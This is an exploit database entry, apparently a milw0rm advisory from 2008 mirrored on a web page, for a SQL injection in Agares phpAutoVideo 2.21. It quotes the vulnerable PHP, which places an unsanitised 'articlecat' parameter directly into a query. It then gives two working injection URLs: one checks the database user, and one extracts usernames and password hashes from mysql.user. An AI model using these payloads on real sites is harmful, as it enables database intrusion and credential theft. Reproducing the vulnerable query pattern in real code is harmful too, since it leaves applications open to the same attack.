[] NeoSense
E X P L O I T S
title author type platform port cve id

Agares phpAutoVideo 2.21 - 'articlecat' SQL Injection (1)

Author: ka0x
type: webapps
platform: php
port: 
date_added: 2008-01-11 
date_updated:  
verified: 1 
codes: OSVDB-40351;CVE-2008-0262 
tags: 
aliases:  
screenshot_url:  
application_url: 
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Agares PhpAutoVideo v2.21 Remote SQL Injection Vulnerability
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

D.O.M TEAM 2008
we are: ka0x, an0de, xarnuz
bug found by ka0x
concat: ka0x01[at]gmail.com>
#from spain

vulnerability in /includes/articleblock.php

vuln code:
------------------------------------------------------------------
$cat = $_GET['articlecat'];
if ($cat == NULL){ $sql = "SELECT * FROM amcms_articles;"; }
else{ $sql = "SELECT * FROM amcms_articles WHERE catid=$cat;"; }
------------------------------------------------------------------

Your user needs to be root@localhost or administrator mysql, check:
http://[host]/includes/articleblock.php?articlecat=-1/**/union/**/select/**/user()/*

user and password from mysql.user:
http://[host]/phpautovideo/includes/articleblock.php?articlecat=-1/**/union/**/select/**/concat(user,0x203a3a20,password)/**/from/**/mysql.user/*

# milw0rm.com [2008-01-12]
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.